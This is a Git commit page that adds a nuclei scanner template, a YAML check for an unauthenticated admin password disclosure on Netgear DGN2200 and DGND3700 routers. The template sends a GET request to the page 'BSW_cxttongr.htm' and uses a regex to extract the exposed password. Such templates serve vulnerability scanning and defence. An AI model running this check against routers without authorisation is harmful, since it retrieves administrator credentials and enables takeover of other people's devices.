daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Netgear Router - Admin Password Disclosure

patch-1
Suman Kar 2021-07-06 19:55:39 +05:30
parent 4b590e43f5
commit 270359703f
1 changed files with 25 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
iot/netgear-admin-password-disclosure.yaml Normal file
View File

@ -0,0 +1,25 @@
id: netgear-DGN2200-DGND3700-admin-password-disclosure
info:
name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure
author: suman_kar
description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
severity: critical
tags: iot,netgear,router
requests:
- raw:
- |
GET /BSW_cxttongr.htm HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
extractors:
- type: regex
name: password
part: body
regex:
- Success ".*"
matchers:
- type: status
status:
- 200